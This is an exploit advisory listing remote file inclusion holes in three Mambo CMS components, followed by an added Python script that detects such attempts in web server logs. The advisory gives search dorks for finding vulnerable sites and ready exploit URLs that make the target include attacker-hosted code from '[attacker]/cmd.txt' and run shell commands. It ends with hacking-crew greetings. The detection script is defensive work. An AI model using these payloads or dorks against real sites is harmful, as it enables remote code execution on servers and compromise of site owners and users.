--------------------------------------------------------------------------------
Title : Multiple Remote File Include Vuln in component Mambo CMS
###############################################################################
Discovered By OLiBekaS
-----------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : component for Mambo CMS
-----------------------------------------------------------------------------
1# BSQ Sitestats
- url : http://www.bs-squared.com/
- dork : index.php?option=com_bsq_sitestats
- exploit : http://[target]/[path]/com_bsq_sitestats/external/rssfeed.php?baseDir=http://[attacker]/cmd.txt?&cmd=ls
------------------------------------------------------------------------------
2# pc_chess Component
- dork : index.php?option=com_pcchess
- exploit : http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls
-------------------------------------------------------------------------------
3# cpg bridge component for Mambo ( Coppermine Bridge Component )
- dork : index.php?option=com_cpg
- exploit : http://[target]/[path]/components/com_cpg/cpg.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls
------------------------------------ [eof] -------------------------------------------
greatz:
~~~~~
# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other
-------------------------------------------------------------------------------
Contact:
~~~~~~~
Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net
--------------------------------- [ eof ] ---------------------------------------
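
Detection sketch for the three entries above (an added example, not part of the original advisory): it scans web server access logs for requests where baseDir or mosConfig_absolute_path carries a URL instead of a local directory, and marks whether the request hit one of the listed scripts. The log format (common/combined), the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Include-path parameters and scripts named in the advisory.
INCLUDE_PARAMS = {"basedir", "mosconfig_absolute_path"}
AFFECTED_SCRIPTS = (
    "com_bsq_sitestats/external/rssfeed.php",
    "com_pcchess/include.pcchess.php",
    "com_cpg/cpg.php",
)
# Common/combined log format: client IP first, request line in quotes.
LOG_LINE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A value beginning with scheme:// names a remote resource, not a local directory.
REMOTE_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)


def find_rfi_attempts(lines):
    """Return one finding per include-path parameter that carries a URL."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        path = unquote(path).lower()
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() in INCLUDE_PARAMS and REMOTE_VALUE.match(value):
                findings.append({
                    "client": m.group("ip"),
                    "path": path,
                    "param": name,
                    "value": value,  # percent-decoded by parse_qsl
                    # True when the request hit a script listed in the advisory.
                    "listed_script": path.endswith(AFFECTED_SCRIPTS),
                })
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.9 - - [01/Jan/2007:10:00:00 +0000] "GET /index.php?option=com_pcchess&Itemid=5 HTTP/1.1" 200 5120',
    '203.0.113.50 - - [01/Jan/2007:10:00:05 +0000] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://198.51.100.7/x.txt?&cmd=ls HTTP/1.1" 200 812',
    '203.0.113.50 - - [01/Jan/2007:10:00:09 +0000] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http%3A%2F%2F198.51.100.7%2Fx.txt%3F HTTP/1.0" 200 640',
    '203.0.113.77 - - [01/Jan/2007:10:01:00 +0000] "GET /index.php?mosConfig_absolute_path=ftp://198.51.100.8/a HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f["client"], f["path"], f["param"], f["value"], f["listed_script"])
```

A hit with listed_script set and a 200 response is the case to triage first; hits on other paths indicate probing for the same parameter elsewhere.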